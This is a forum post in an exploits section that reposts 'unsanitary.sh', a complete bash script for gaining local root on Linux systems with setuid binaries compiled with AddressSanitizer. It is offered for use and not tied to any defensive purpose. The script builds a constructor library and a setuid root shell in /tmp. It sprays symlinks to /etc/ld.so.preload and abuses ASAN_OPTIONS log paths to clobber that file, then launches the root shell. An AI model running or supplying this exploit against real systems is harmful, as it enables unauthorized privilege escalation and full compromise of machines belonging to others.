Jump to content
geeko

ASAN/SUID Local Root Exploit

By geeko, in Exploituri

Recommended Posts

geeko Newbie

geeko

Posted
Posted 
#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
# Released under the Snitches Get Stitches Public Licence.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (18/02/2016)
# FREE LAURI LOVE!
echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)"
if [[ $# -eq 0 ]] ; then
echo "use: $0 /full/path/to/targetbin"
echo "where targetbin is setuid root and compiled w/ ASAN"
exit 0
fi
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we drop our python symlink spraying tool..."
cat << EOF > sym.py
#!/usr/bin/python
import os
curpid=os.getpid()
print curpid
for x in range(0,100):
newpid=curpid+x
boom = "foo.%s" %(str(newpid))
os.symlink("/etc/ld.so.preload", boom)
EOF
echo "[+] Spraying dir with symlinks..."
python sym.py
echo "[+] Hack the planet!"
ASAN_OPTIONS='suppressions="/hacktheplanet
/tmp/libhax.so
hacktheplanet" log_path=./foo verbosity=1' $1 >/dev/null 2>&1
$1 >/dev/null 2>&1
echo "[+] Tidy up a bit..."
rm -f foo*
rm -f sym.py
rm -f /tmp/libhax.so
echo "[<3] :PPpPpPpOpr000000t!"
/tmp/rootshell

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...